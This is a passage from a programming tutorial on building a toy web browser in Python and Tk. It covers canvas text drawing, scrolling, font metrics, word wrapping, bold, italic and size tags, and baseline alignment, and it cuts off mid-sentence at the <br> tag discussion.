You ought to see: a rectangle, starting near the top-left corner of the canvas and ending at its center; then a circle inside that rectangle; and then the text “Hi!” next to the circle.
Coordinates in Tk refer to X positions from left to right and to Y positions from top to bottom. In other words, the bottom of the screen has larger Y values, the opposite of what you might be used to from math. Play with the coordinates above to figure out what each argument refers to.The answers are in the online documentation.
The Tk canvas widget is quite a bit more powerful than what we’re using it for here. As you can see from the tutorial, you can move the individual things you’ve drawn to the canvas, listen to click events on each one, and so on. In this book, I’m not using those features, because I want to teach you how to implement them.
Let’s draw a simple web page on this canvas. So far, the toy browser steps through the web page source code character by character and prints the text (but not the tags) to the console window. Now we want to draw the characters on the canvas instead.
To start, let’s change the show
function from the
previous chapter into a function that I’ll call lex
Foreshadowing future
developments… which just returns the
text-not-tags content of an HTML document, without printing it:
def lex(body):
    text = ""
    # ...
    for c in body:
        # ...
        elif not in_angle:
            text += c
    return text
Then, load
will draw that text, character by
character:
def load(self, url):
    # ...
    for c in text:
        self.canvas.create_text(100, 100, text=c)
Let’s test this code on a real webpage. For reasons that might seem
inscrutableIt’s to delay
a discussion of basic typography to the next chapter…,
let’s test it on the first chapter of
西游记 or “Journey to the West”, a classic
Chinese novel about a monkey. Run this URLRight click on the link and
“Copy URL”. through request
,
lex
, and load
.If you’re not in Asia, you’ll
probably see this phase take a while: China is far away!
You should see a window with a big blob of black pixels inset a bit from
the top left corner of the window.
Why a blob instead of letters? Well, of course, because we are drawing every letter in the same place, so they all overlap! Let’s fix that:
HSTEP, VSTEP = 13, 18

cursor_x, cursor_y = HSTEP, VSTEP
for c in text:
    self.canvas.create_text(cursor_x, cursor_y, text=c)
    cursor_x += HSTEP
The variables cursor_x
and cursor_y
point
to where the next character will go, as if you were typing the text
in a word processor. I picked the magic numbers, 13 and 18, by trying a
few different values and picking one that looked most readable. In the
next chapter, we’ll replace magic numbers with
font metrics.
The text now forms a line from left to right. But with an 800 pixel wide canvas and 13 pixels per character, one line only fits about 60 characters. You need more than that to read a novel, so we also need to wrap the text once we reach the edge of the screen:
for c in text:
    # ...
    if cursor_x >= WIDTH - HSTEP:
        cursor_y += VSTEP
        cursor_x = HSTEP
The code increases cursor_y
and resets
cursor_x
In
the olden days of typewriters, increasing y meant
feeding in a new line, and resetting x meant
returning the carriage that printed letters to the
left edge of the page. So ASCII standardizes two separate
characters—“carriage return” and “line feed”—for these operations, so
that ASCII could be directly executed by teletypewriters. That’s why
headers in HTTP are separated by \r\n
, even though modern
computers have no mechanical carriage. once
cursor_x
goes past 787 pixels.Not 800, because we started at
pixel 13 and I want to leave an even gap on both sides.
Wrapping the text this way makes it possible to read more than a single
line:
Now we can read a lot of text, but still not all of it: on a long enough page, the lines of text don't all fit on the screen. We want users to scroll the page to look at different parts of it.
Chinese characters are usually, but not always, independent: 开关 means “button” but is composed of 开 “on” and 关 “off”. A line break between them would be confusing, because you’d read “on off” instead of “button”. The ICU library, used by both Firefox and Chrome, uses dynamic programming to guess phrase boundaries based on a word frequency table.
Scrolling introduces a layer of indirection between page coordinates (this text is 132 pixels from the top of the page) and screen coordinates (since you’ve scrolled 60 pixels down, this text is 72 pixels from the top of the screen). Generally speaking, a browser lays out the page—determines where everything on the page goes—in terms of page coordinates and then renders the page—draws everything—in terms of screen coordinates.Sort of. What actually happens is that the page is first drawn into a bitmap or GPU texture, then that bitmap/texture is shifted according to the scroll, and the result is rendered to the screen. Chapter 12 will have more on this topic.
Our browser will have the same split. Right now load
both computes the position of each character and draws it: layout and
rendering. Let’s have a layout
function to compute and
store the position of each character, and a separate draw
function to then draw each character based on the stored position. This
way, layout
can operate with page coordinates and only
draw
needs to think about screen coordinates.
Let’s start with layout
. Instead of calling
canvas.create_text
on each character let’s add it to a
list, together with its position. Since layout
doesn’t need
to access anything in Browser
, it can be a standalone
function:
def layout(text):
    display_list = []
    cursor_x, cursor_y = HSTEP, VSTEP
    for c in text:
        display_list.append((cursor_x, cursor_y, c))
        # ...
    return display_list
The resulting list is called a display list: it is a list of
things to display.The
term is standard. Since layout
is all about
page coordinates, we don’t need to change anything else about it to
support scrolling.
Once the display list is computed, draw
needs to loop
through the display list and draw each character:
class Browser:
    def draw(self):
        for x, y, c in self.display_list:
            self.canvas.create_text(x, y, text=c)
Since draw
does need access to the canvas, we keep it a
method on Browser
. Now the load
just needs to
call layout
followed by draw
:
class Browser:
    def load(self, url):
        headers, body = url.request()
        text = lex(body)
        self.display_list = layout(text)
        self.draw()
Now we can add scrolling. Let’s have a variable for how far you’ve scrolled:
class Browser:
    def __init__(self):
        # ...
        self.scroll = 0
The page coordinate y
then has screen coordinate
y - self.scroll
:
def draw(self):
    for x, y, c in self.display_list:
        self.canvas.create_text(x, y - self.scroll, text=c)
If you change the value of scroll
the page will now
scroll up and down. But how does the user change
scroll
?
Storing the display list makes scrolling faster: the browser isn’t
doing layout
every time you scroll. Modern browsers take
this further, retaining much of the display list even when the web
page changes due to JavaScript or user interaction.
Most browsers scroll the page when you press the up and down keys, rotate the scroll wheel, drag the scroll bar, or apply a touch gesture to the screen. To keep things simple, let’s just implement the down key.
Tk allows you to bind a function to a key, which instructs Tk to call that function when the key is pressed. For example, to bind to the down arrow key, write:
def __init__(self):
    # ...
    self.window.bind("<Down>", self.scrolldown)
Here, self.scrolldown
is an event handler, a
function that Tk will call whenever the down arrow key is pressed.scrolldown
is
passed an event object as an argument by Tk, but since
scrolling down doesn’t require any information about the key press,
besides the fact that it happened, scrolldown
ignores that
event object. All it needs to do is increment scroll
and redraw the canvas:
SCROLL_STEP = 100

def scrolldown(self, e):
    self.scroll += SCROLL_STEP
    self.draw()
If you try this out, you’ll find that scrolling draws all the text a
second time. That’s because we didn’t erase the old text before drawing
the new text. Call canvas.delete
to clear the old text:
def draw(self):
    self.canvas.delete("all")
    # ...
Scrolling should now work!
But this scrolling is pretty slow.How fast exactly seems to depend a lot on your operating
system and default font. Why? It turns out that loading
information about the shape of a character, inside
create_text
, takes a while. To speed up scrolling we need
to make sure to do it only when necessary (while at the same time
ensuring the pixels on the screen are always correct).
Real browsers incorporate a lot of quite tricky optimizations to this
process, but for this toy browser let’s limit ourselves to a simple
improvement: on a long page most characters are outside the viewing
window, and we can skip drawing them in draw
:
for x, y, c in self.display_list:
    if y > self.scroll + HEIGHT: continue
    if y + VSTEP < self.scroll: continue
    # ...
The first if
statement skips characters below the
viewing window; the second skips characters above it. In that second
if
statement, y + VSTEP
computes the bottom
edge of the character, so that characters that are halfway inside the
viewing window are still drawn.
Scrolling should now be pleasantly fast, and hopefully well within
the 16ms animation frame budget. And because we split
layout
and draw
, we don’t need to change
layout
at all to implement this optimization.
Though you’re probably writing your browser on a desktop computer, many people access the web through mobile devices such as phones or tablets. On mobile devices, there’s still a screen, a rendering loop, and most other things discussed in this book.For example, most real browsers have both desktop and mobile editions, and the rendering engine code is almost exactly the same for both. But there are several differences worth noting:
One example: in a mobile-friendly page's <head> you'll see a “viewport” <meta> tag. This tag gives instructions to the browser for how to handle zooming on a mobile device. Without this tag, the browser makes assumptions, for historical reasons, that the site is “desktop-only” and needs some special tricks to make it readable on a mobile device, such as allowing the user to use a pinch-zoom or double-tap touchscreen gesture to focus in on one part of the page. Once zoomed in, the part of the page visible on the screen is the “visual viewport” and the whole document's bounds are the “layout viewport”.
This chapter went from a rudimentary command-line browser to a graphical user interface with text that can be scrolled.
Next, we’ll make this browser work on English text, with all its complexities of variable width characters, line layout, and formatting.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
    def __init__(url)
    def request()
def lex(body)
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
def layout(text)
class Browser:
    def __init__()
    def load(url)
    def draw()
    def scrolldown(e)
if __name__ == "__main__"
Line breaks: Change layout
to end the current
line and start a new one when it sees a newline character. Increment
y by more than VSTEP
to give the illusion of
paragraph breaks. There are poems embedded in “Journey to the West”;
you’ll now be able to make them out.
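One possible shape for this change, sketched as a standalone function with the chapter's constants; the 1.5 × VSTEP paragraph gap is an assumption you can tune.

```python
# Sketch for the line-breaks exercise: a layout variant that ends the
# line on "\n" and leaves extra vertical space for paragraph breaks.
HSTEP, VSTEP = 13, 18
WIDTH = 800

def layout_with_newlines(text):
    display_list = []
    cursor_x, cursor_y = HSTEP, VSTEP
    for c in text:
        if c == "\n":
            cursor_y += int(1.5 * VSTEP)  # assumed paragraph gap
            cursor_x = HSTEP
            continue
        display_list.append((cursor_x, cursor_y, c))
        cursor_x += HSTEP
        if cursor_x >= WIDTH - HSTEP:
            cursor_y += VSTEP
            cursor_x = HSTEP
    return display_list
```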
Mouse wheel: Add support for scrolling up when you hit the
up arrow. Make sure you can’t scroll past the top of the page.It’s harder to stop scrolling
past the bottom of the page; we will implement this in Chapter 5. Then bind the
<MouseWheel>
event, which triggers when you scroll
with the mouse wheel.It
will also trigger with touchpad gestures, if you don’t have a
mouse. The associated event object has an
event.delta
value which tells you how far and in what
direction to scroll. Unfortunately, Mac and Windows give the
event.delta
objects opposite sign and different scales, and
on Linux, scrolling instead uses the <Button-4>
and
<Button-5>
events.The Tk
manual has more information about this. It’s not easy to write
cross-platform applications!
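Here is a sketch of the delta normalization, kept separate from Tk so the arithmetic is testable. The scale factors (multiples of 120 on Windows, small deltas on macOS) and the signs are assumptions to verify on your own machine, exactly as the exercise warns.

```python
# Sketch for the mouse-wheel exercise: convert a platform-dependent
# event.delta into a scroll amount. Negative result scrolls up.
SCROLL_STEP = 100

def wheel_scroll_amount(delta, platform):
    if platform == "darwin":
        return -delta * SCROLL_STEP           # macOS: small integer deltas
    else:
        return -(delta // 120) * SCROLL_STEP  # Windows: multiples of 120
```

In the handler you would then clamp: self.scroll = max(0, self.scroll + amount).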
Emoji: Add support for emoji to our browser. Emoji are
characters, and you can call create_text
to draw them, but
the results aren’t very good. Instead, head to the OpenMoji project, download the emoji
for “grinning
face” as a PNG file, convert to GIF, resize it to 16×16 pixels, and
save it to the same folder as the browser. Use Tk’s
PhotoImage
class to load the image and then the
create_image
method to draw it to the canvas. In fact,
download the whole OpenMoji library (look for the “Get OpenMojis” button
at the top right)—then your browser can look up whatever emoji is used
in the page.
Resizing: Make the browser resizable. To do so, pass the
fill
and expand
arguments to
canvas.pack
, and bind to the
<Configure>
event, which happens when the window is
resized. The window’s new width and height can be found in the
width
and height
fields on the event object.
Remember that when the window is resized, the line breaks must change,
so you will need to call layout
again.
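The resize flow can be sketched without Tk at all: the handler records the new width and recomputes the layout. ResizableBrowser and FakeEvent are names invented for this sketch; in the real browser you would bind the method with self.window.bind("<Configure>", self.resize) and read e.width from Tk's event object.

```python
# Sketch for the resizing exercise: re-run layout at the new width.
HSTEP, VSTEP = 13, 18

def layout(text, width):
    display_list = []
    cursor_x, cursor_y = HSTEP, VSTEP
    for c in text:
        display_list.append((cursor_x, cursor_y, c))
        cursor_x += HSTEP
        if cursor_x >= width - HSTEP:
            cursor_y += VSTEP
            cursor_x = HSTEP
    return display_list

class ResizableBrowser:
    def __init__(self, text):
        self.text = text
        self.width = 800

    def resize(self, event):
        # event.width comes from the <Configure> event in real Tk
        self.width = event.width
        self.display_list = layout(self.text, self.width)

class FakeEvent:  # stand-in for Tk's event object
    def __init__(self, width): self.width = width
```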
Zoom: Make the +
key double the text size. You
will need to use the font
argument in
create_text
to change the size of text, like this:
font = tkinter.font.Font(size=32)
canvas.create_text(200, 150, text="Hi!", font=font)
Be careful in how you split the task between layout
and
draw
. Make sure that text doesn’t overlap when you zoom in
and that scrolling works when zoomed in.
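One way to split the task, sketched here with layout made zoom-aware so draw only has to pick the right font size; layout_zoomed and the zoom parameter are assumptions about how you might structure it.

```python
# Sketch for the zoom exercise: scale the horizontal and vertical
# steps by the zoom factor inside layout.
HSTEP, VSTEP = 13, 18

def layout_zoomed(text, zoom=1):
    display_list = []
    step = HSTEP * zoom
    cursor_x, cursor_y = step, VSTEP * zoom
    for c in text:
        display_list.append((cursor_x, cursor_y, c))
        cursor_x += step
    return display_list
```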
In the last chapter, your web browser created a graphical window and drew a grid of characters to it. That’s OK for Chinese, but English text features characters of different widths and words that you can’t break across lines.There are lots of languages in the world, and lots of typographic conventions. A real web browser supports every language from Arabic to Zulu, but this book focuses on English. Text is near-infinitely complex, but this book cannot be infinitely long! In this chapter, we’ll add those capabilities. You’ll be able to read this page in your browser!
So far, we’ve called create_text
with a character and
two coordinates to write text to the screen. But we never specified the
font, the size, or the color. To talk about those things, we need to
create and use font objects.
What is a font, exactly? Well, in the olden days, printers arranged little metal slugs on rails, covered them with ink, and pressed them to a sheet of paper, creating a printed page. The metal shapes came in boxes, one per letter, so you’d have a (large) box of e’s, a (small) box of x’s, and so on. The boxes came in cases (one for uppercase and one for lowercase letters). The set of cases was called a font.The word is related to foundry, which would create the little metal shapes. Naturally, if you wanted to print larger text, you needed different (bigger) shapes, so those were a different font; a collection of fonts was called a type, which is why we call it typing. Variations—like bold or italic letters—were called that type’s “faces”.
This nomenclature reflects the world of the printing press: metal shapes in boxes in cases of different types. Our modern world instead has dropdown menus, and the old words no longer match it. “Font” can now mean font, typeface, or type,Let alone “font family”, which can refer to larger or smaller collections of types. and we say a font contains several different weights (like “bold” and “normal”),But sometimes other weights as well, like “light”, “semibold”, “black”, and “condensed”. Good fonts tend to come in many weights. several different styles (like “italic” and “roman”, which is what not-italic is called),Sometimes there are other options as well, like maybe there’s a small-caps version; these are sometimes called options as well. And don’t get me started on automatic versus manual italics. and arbitrary sizes.Fonts look especially good at certain sizes, where hints tell the computer how best to align them to the pixel grid. Welcome to the world of magic ink.
Yet Tk’s font objects correspond to the older meaning of
font: a type at a fixed size, style, and weight. For example:You can only create
Font
objects, or any other kinds of Tk objects, after
calling tkinter.Tk()
, which is why I’m putting this code in
the Browser constructor.
import tkinter.font
class Browser:
    def __init__(self):
        # ...
        bi_times = tkinter.font.Font(
            family="Times",
            size=16,
            weight="bold",
            slant="italic",
        )
Your computer might not have “Times” installed; you can list the
available fonts with tkinter.font.families()
and pick
something else.
Font objects can be passed to create_text
’s
font
argument:
canvas.create_text(200, 100, text="Hi!", font=bi_times)
In the olden times, American type setters kept their boxes of metal shapes arranged in a California job case, which combined lower- and upper-case letters side by side in one case, making type setting easier. The upper-/lower-case nomenclature dates from centuries earlier.
Text takes up space vertically and horizontally, and the font
object’s metrics
and measure
methods measure
that space:On your
computer, you might get different numbers. That’s right—text rendering
is OS-dependent, because it is complex enough that everyone uses one of
a few libraries to do it, usually libraries that ship with the OS.
That’s why macOS fonts tend to be “blurrier” than the same font on
Windows: different libraries make different
trade-offs.
>>> bi_times.metrics()
{'ascent': 15, 'descent': 7, 'linespace': 22, 'fixed': 0}
>>> bi_times.measure("Hi!")
31
The metrics
call yields information about the vertical
dimensions of the text: the linespace
is how tall the text
is, which includes an ascent
which goes “above the line”
and a descent
that goes “below the line”.The fixed
parameter is actually a boolean and tells you whether all letters are
the same width, so it doesn’t really fit here.
The ascent
and descent
matter when words in
different sizes sit on the same line: they ought to line up “along the
line”, not along their tops or bottoms.
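The arithmetic behind “along the line” can be shown with metrics like the ones printed above (your numbers may differ): pick a shared baseline, then offset each word's top by the difference between the tallest ascent and its own ascent. The dicts here stand in for real font objects.

```python
# Worked example of baseline alignment using illustrative metrics.
times = {"ascent": 15, "descent": 7}    # like bi_times above
courier = {"ascent": 13, "descent": 4}  # a second, shorter font

max_ascent = max(times["ascent"], courier["ascent"])
y = 100  # top of the line
# Each word's top is pushed down so that all ascents end at one baseline.
times_top = y + max_ascent - times["ascent"]
courier_top = y + max_ascent - courier["ascent"]
```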
Let’s dig deeper. Remember that bi_times
is size-16
Times: why does font.metrics
report that it is actually 22
pixels tall? Well, first of all, size-16 meant sixteen points,
which are defined as 72nds of an inch, not sixteen
pixels, which your monitor probably has around 100 of per
inch.Tk doesn’t use
points anywhere else in its API. It’s supposed to use pixels if you pass
it a negative number, but that doesn’t appear to work.
Those sixteen points measure not the individual letters but the metal
blocks the letters were once carved from, which by necessity were larger
than the letters themselves. In fact, different size-16 fonts have
letters of varying heights:
>>> tkinter.font.Font(family="Courier", size=16).metrics()
{'fixed': 1, 'ascent': 13, 'descent': 4, 'linespace': 17}
>>> tkinter.font.Font(family="Times", size=16).metrics()
{'fixed': 0, 'ascent': 14, 'descent': 4, 'linespace': 18}
>>> tkinter.font.Font(family="Helvetica", size=16).metrics()
{'fixed': 0, 'ascent': 15, 'descent': 4, 'linespace': 19}
The measure()
method is more direct: it tells you how
much horizontal space text takes up, in pixels. This depends on
the text, of course, since different letters have different width:The sum at the end of this
snippet may not work on your machine: the width of a word is not always
the sum of the widths of its letters. That’s because Tk uses fractional
pixels internally, but rounds up to return whole pixels. For example,
some fonts use something called kerning to shift letters a
little bit when particular pairs of letters are next to one
another.
>>> bi_times.measure("Hi!")
31
>>> bi_times.measure("H")
17
>>> bi_times.measure("i")
6
>>> bi_times.measure("!")
8
>>> 17 + 8 + 6
31
You can use this information to lay text out on the page. For example, suppose you want to draw the text “Hello, world!” in two pieces, so that “world!” is italic. Let’s use two fonts:
font1 = tkinter.font.Font(family="Times", size=16)
font2 = tkinter.font.Font(family="Times", size=16, slant='italic')
We can now lay out the text, starting at (200, 200)
:
x, y = 200, 200
canvas.create_text(x, y, text="Hello, ", font=font1)
x += font1.measure("Hello, ")
canvas.create_text(x, y, text="world!", font=font2)
You should see “Hello,” and “world!”, correctly aligned and with the second word italicized.
Unfortunately, this code has a bug, though one masked by the choice
of example text: replace “world!” with “overlapping!” and the two words
will overlap. That’s because the coordinates x
and
y
that you pass to create_text
tell Tk where
to put the center of the text. It only worked for “Hello,
world!” because “Hello,” and “world!” are the same length!
Luckily, the meaning of the coordinate you pass in is configurable.
We can instruct Tk to treat the coordinate we gave as the top-left
corner of the text by setting the anchor
argument to
"nw"
, meaning the “northwest” corner of the text:
x, y = 200, 225
canvas.create_text(x, y, text="Hello, ", font=font1, anchor='nw')
x += font1.measure("Hello, ")
canvas.create_text(x, y, text="overlapping!", font=font2, anchor='nw')
Modify the draw
function to set anchor
to
"nw"
; we didn’t need to do that in the previous chapter
because all Chinese characters are the same width.
If you find font metrics confusing, you’re not the only one! In 2012, the Michigan Supreme Court heard Stand Up for Democracy v. Secretary of State, a case that centered on the definition of font size. The court decided (correctly) that font size is the size of the metal blocks that letters were carved from and not the size of the letters themselves.
In the last chapter, the layout
function looped over the
text character-by-character and moved to the next line whenever we ran
out of space. That’s appropriate in Chinese, where each character more
or less is a word. But in English you can’t move to the next
line in the middle of a word. Instead, we need to lay out the text one
word at a time:This code
splits words on whitespace. It’ll thus break on Chinese, since there
won’t be whitespace between words. Real browsers use language-dependent
rules for laying out text, including for identifying word
boundaries.
w = font.measure(word)
if cursor_x + w > WIDTH - HSTEP:
    cursor_y += font.metrics("linespace") * 1.25
    cursor_x = HSTEP
display_list.append((cursor_x, cursor_y, word))
cursor_x += w + font.measure(" ")
There are a lot of moving parts to this code. First, we measure the
width of the text and store it in w. We’d normally draw
the text at cursor_x, so its right end would be at
cursor_x + w; we check whether that’s past the edge of the
page. Now that we have the location to start drawing the word, we
add it to the display list; finally, we update cursor_x to
point past the end of the word.
There are a few surprises in this code. One is that I call
metrics
with an argument; that just returns the named
metric directly. Also, I increment cursor_x
by
w + font.measure(" ")
instead of w
. That’s
because I want to have spaces between the words: the call to
split()
removed all of the whitespace, and this adds it
back. I don’t add the space to w
on the second line,
though, because you don’t need a space after the last word on a
line.
Finally, note that I multiply the linespace by 1.25 when incrementing
y
. Try removing the multiplier: you’ll see that the text is
harder to read because the lines are too close together.Designers say the text is too
“tight”. Instead, it is common to add “line spacing” or
“leading”So named
because in metal type days, thin pieces of lead were placed between the
lines to space them out. Lead is a softer metal than what the actual
letter pieces were made of, so it could compress a little to keep
pressure on the other pieces. Pronounce it “led-ing” not
“leed-ing”. between lines. The 25% line spacing is a
normal amount.
Breaking lines in the middle of a word is called hyphenation, and can
be turned on via the hyphens
CSS property. To implement it, browsers use the Knuth-Liang
hyphenation algorithm, which uses a dictionary of word fragments to
prioritize possible hyphenation points.
Right now, all of the text on the page is drawn with one font. But
web pages sometimes bold or italicize text
using the <b>
and <i>
tags. It’d
be nice to support that, but right now, the code resists the change: the
layout
function only receives the text of the page as
input, and so has no idea where the bold and italics tags are.
Let’s change lex
to return a list of tokens,
where a token is either a Text
object (for a run of
characters outside a tag) or a Tag
object (for the contents
of a tag). You’ll need to write the Text
and
Tag
classes:If you’re familiar with Python, you might want to use the
dataclass
library, which makes it easier to define these
sorts of utility classes.
class Text:
    def __init__(self, text):
        self.text = text

class Tag:
    def __init__(self, tag):
        self.tag = tag
lex
must now gather text into Text
and
Tag
objects:If you’ve done exercises in prior chapters, your code will
look different. Code snippets in the book always assume you haven’t done
the exercises, so you’ll need to port your
modifications.
def lex(body):
    out = []
    text = ""
    in_tag = False
    for c in body:
        if c == "<":
            in_tag = True
            if text: out.append(Text(text))
            text = ""
        elif c == ">":
            in_tag = False
            out.append(Tag(text))
            text = ""
        else:
            text += c
    if not in_tag and text:
        out.append(Text(text))
    return out
At the end of the loop, lex
dumps any accumulated text
as a Text
object. Otherwise, if you never saw an angle
bracket, you’d return an empty list of tokens. But unfinished tags, like
in Hi!<hr
, are thrown out.This may strike you as an odd
decision: why not raise an error, or finish up the tag for the author?
Good questions, but dropping the tag is what browsers
do.
Note that Text and Tag are asymmetric:
lex avoids empty Text objects, but not empty
Tag objects. That’s because an empty Tag
object represents the HTML code <>, while an empty
Text object represents no content at all.
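To sanity-check this behavior, here is the lexer assembled from the snippets above, run on a couple of tiny inputs (a quick standalone sketch, not part of the browser itself):

```python
class Text:
    def __init__(self, text):
        self.text = text

class Tag:
    def __init__(self, tag):
        self.tag = tag

def lex(body):
    out = []
    text = ""
    in_tag = False
    for c in body:
        if c == "<":
            in_tag = True
            if text: out.append(Text(text))
            text = ""
        elif c == ">":
            in_tag = False
            out.append(Tag(text))
            text = ""
        else:
            text += c
    if not in_tag and text:
        out.append(Text(text))
    return out

# A run of text between tags becomes one Text token:
lex("<b>Hi</b>")   # -> [Tag("b"), Text("Hi"), Tag("/b")]

# An unfinished tag is silently dropped:
lex("Hi!<hr")      # -> [Text("Hi!")]
```

The second call shows the dropped-tag rule: `Hi!` is emitted as a `Text` token, but the incomplete `<hr` never produces a `Tag`.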
Since we’ve modified lex, we are now passing
layout not just the text of the page but also the tags in
it. So layout must loop over tokens, not text:
def layout(tokens):
    # ...
    for tok in tokens:
        if isinstance(tok, Text):
            for word in tok.text.split():
                # ...
    # ...
layout
can also examine tag tokens to change font when
directed by the page. Let’s start with support for weights and styles,
with two corresponding variables:
weight = "normal"
style = "roman"
Those variables must change when the bold and italics open and close tags are seen:
if isinstance(tok, Text):
    # ...
elif tok.tag == "i":
    style = "italic"
elif tok.tag == "/i":
    style = "roman"
elif tok.tag == "b":
    weight = "bold"
elif tok.tag == "/b":
    weight = "normal"
Note that this code correctly handles not only
<b>bold</b>
and
<i>italic</i>
text, but also
<b><i>bold italic</i></b>
text.It even handles
mis-nested tags like
<b>b<i>bi</b>i</i>
, but it does not
handle <b><b>twice</b>bolded</b>
text. We’ll return to both in the next
chapter.
The weight and style variables are used to
select the font. Since the font is computed in layout but
used in draw, we’ll need to add the font used to each entry
in the display list.
if isinstance(tok, Text):
    for word in tok.text.split():
        font = tkinter.font.Font(
            size=16,
            weight=weight,
            slant=style,
        )
        # ...
        display_list.append((cursor_x, cursor_y, word, font))
Make sure to update draw
to expect and use this extra
font field in display list entries.
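For reference, the updated draw might look something like the sketch below. It assumes the canvas, scroll, and display_list fields from the previous chapter, and the exact scrolling details may differ from your code:

```python
WIDTH, HEIGHT = 800, 600
VSTEP = 18

class Browser:
    # Sketch of the updated method; assumes self.canvas, self.scroll,
    # and self.display_list are set up as in the previous chapter.
    def draw(self):
        self.canvas.delete("all")
        for x, y, word, font in self.display_list:
            # Skip entries outside the visible window, as before.
            if y > self.scroll + HEIGHT: continue
            if y + VSTEP < self.scroll: continue
            self.canvas.create_text(
                x, y - self.scroll, text=word,
                font=font, anchor="nw")
```

The only changes from the previous chapter are unpacking the extra font field and passing it (plus the "nw" anchor) to create_text.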
Italic fonts were developed in Italy (hence the name) to mimic a cursive handwriting style called “chancery hand”. Non-italic fonts are called roman because they mimic text on Roman monuments. There is an obscure third option: oblique fonts, which look like roman fonts but are slanted.
With all of these tags, layout
has become quite large,
with lots of local variables and some complicated control flow. That is
one sign that something deserves to be a class, not a function:
class Layout:
    def __init__(self, tokens):
        self.display_list = []
Every local variable in layout
then becomes a field of
Layout
:
self.cursor_x = HSTEP
self.cursor_y = VSTEP
self.weight = "normal"
self.style = "roman"
The core of the old layout
is a loop over tokens, and we
can move the body of that loop to a method on Layout
:
def __init__(self, tokens):
    # ...
    for tok in tokens:
        self.token(tok)

def token(self, tok):
    if isinstance(tok, Text):
        for word in tok.text.split():
            # ...
    elif tok.tag == "i":
        self.style = "italic"
    # ...
In fact, the body of the isinstance(tok, Text)
branch
can be moved to its own method:
def word(self, word):
    font = tkinter.font.Font(
        size=16,
        weight=self.weight,
        slant=self.style,
    )
    w = font.measure(word)
    # ...
Now that everything has moved out of Browser
’s old
layout
function, it can be replaced with calls into
Layout
:
class Browser:
    def load(self, url):
        headers, body = url.request()
        tokens = lex(body)
        self.display_list = Layout(tokens).display_list
        self.draw()
When you do big refactors like this, it’s important to work incrementally. It might seem more efficient to change everything at once, but that efficiency brings with it a risk of failure: trying to do so much that you get confused and have to abandon the whole refactor.
Anyway, this refactor isolated all of the text-handling code into its
own method, with the main token
function just branching on
the tag name. Let’s take advantage of the new, cleaner organization to
add more tags. With font weights and styles working, size is the next
frontier in typographic sophistication. One simple way to change font
size is the <small>
tag and its deprecated sister tag
<big>
.In your web design projects, use the CSS
font-size
property to change text size instead of
<big>
and <small>
. But since we
haven’t implemented CSS for our browser, we’re
stuck using them here.
Our experience with font styles and weights suggests a simple
approach. First, a field in Layout
to track font size:
self.size = 16
That variable is used to create the font object:
font = tkinter.font.Font(
    size=self.size,
    weight=self.weight,
    slant=self.style,
)
Finally, the <big>
and <small>
tags change the value of size
:
def token(self, tok):
    # ...
    elif tok.tag == "small":
        self.size -= 2
    elif tok.tag == "/small":
        self.size += 2
    elif tok.tag == "big":
        self.size += 4
    elif tok.tag == "/big":
        self.size -= 4
Try wrapping a whole paragraph in <small>
, like
you would a bit of fine print, and enjoy your newfound typographical
freedom.
All of <b>
, <i>
,
<big>
, and <small>
date from an
earlier, pre-CSS era of the web. Since CSS can now change how those tags
appear, <b>
, <i>
, and
<small>
have hair-splitting appearance-independent
meanings.
Start mixing font sizes, like
<small>a</small><big>A</big>
, and
you’ll quickly notice a problem with the font size code: the text is
aligned along its top, not “along the line”, as if it’s hanging from a
clothes line.
Let’s think through how to fix this. If the big text is moved up, it
would overlap with the previous line, so the smaller text has to be
moved down. That means its vertical position has to be computed later,
after the big text passes through token
. But since
the small text comes through the loop first, we need a two-pass
algorithm for lines of text: the first pass identifies what words go in
the line and computes their x positions, while the second pass
vertically aligns the words and computes their y positions.
Let’s start with phase one. Since one line contains text from many
tags, we need a field on Layout to store the line-to-be.
That field, line, will be a list, and word
will add words to it instead of to the display list. Entries in
line will have x but not y positions,
since y positions aren’t computed in the first phase:
class Layout:
    def __init__(self, tokens):
        # ...
        self.line = []

    def word(self, word):
        # ...
        self.line.append((self.cursor_x, word, font))
The new line
field is essentially a buffer, where words
are held temporarily before they can be placed. The second phase is that
buffer being flushed when we’re finished with a line:
class Layout:
    def word(self, word):
        if self.cursor_x + w > WIDTH - HSTEP:
            self.flush()
As usual with buffers, we also need to make sure the buffer is flushed once all tokens are processed:
class Layout:
    def __init__(self, tokens):
        # ...
        self.flush()
This new flush function has three responsibilities:
1. It must align the words along the baseline;
2. It must add all those words to the display list; and
3. It must update the cursor_x and cursor_y fields.
Here’s what it looks like, step by step:
Since we want words to line up “on the line”, let’s start by computing where that line should be. That depends on the metrics for all the fonts involved:
def flush(self):
    if not self.line: return
    metrics = [font.metrics() for x, word, font in self.line]
We need to locate the tallest word:
max_ascent = max([metric["ascent"] for metric in metrics])
The line is then max_ascent below self.cursor_y—or
actually a little more, to account for the leading:Actually, 25% leading doesn’t
add 25% of the ascender above the ascender and 25% of the descender
below the descender. Instead, it adds 12.5% of the line
height in both places, which is subtly different when fonts are
mixed. But let’s skip that subtlety here.
baseline = self.cursor_y + 1.25 * max_ascent
Now that we know where the line is, we can place each word relative to that line and add it to the display list:
for x, word, font in self.line:
    y = baseline - font.metrics("ascent")
    self.display_list.append((x, y, word, font))
Note how y starts at the baseline, and moves up
by just enough to accommodate that word’s ascender.
Finally, flush must update the Layout’s
cursor_x, cursor_y, and line
fields. cursor_x and line are easy:
self.cursor_x = HSTEP
self.line = []
Meanwhile, cursor_y must be far enough below
baseline to account for the deepest descender:
max_descent = max([metric["descent"] for metric in metrics])
self.cursor_y = baseline + 1.25 * max_descent
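Putting these steps together, the complete flush method looks like this (collected from the snippets above):

```python
HSTEP = 13

class Layout:
    # flush assembled from the snippets above; the other fields and
    # methods are as described earlier in the chapter.
    def flush(self):
        if not self.line: return
        metrics = [font.metrics() for x, word, font in self.line]
        # First, find the tallest ascender and place the baseline.
        max_ascent = max([metric["ascent"] for metric in metrics])
        baseline = self.cursor_y + 1.25 * max_ascent
        # Second, hang each word from the baseline.
        for x, word, font in self.line:
            y = baseline - font.metrics("ascent")
            self.display_list.append((x, y, word, font))
        # Third, move past the deepest descender and reset the buffer.
        max_descent = max([metric["descent"] for metric in metrics])
        self.cursor_y = baseline + 1.25 * max_descent
        self.cursor_x = HSTEP
        self.line = []
```
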
Now all the text is aligned along the line, even when text sizes are
mixed. Plus, this new flush
function is convenient for
other line breaking jobs. For example, in HTML the
<br>
tagWhich is a self-closing tag, so there’s no
</br>
. Many tags that are content, instead
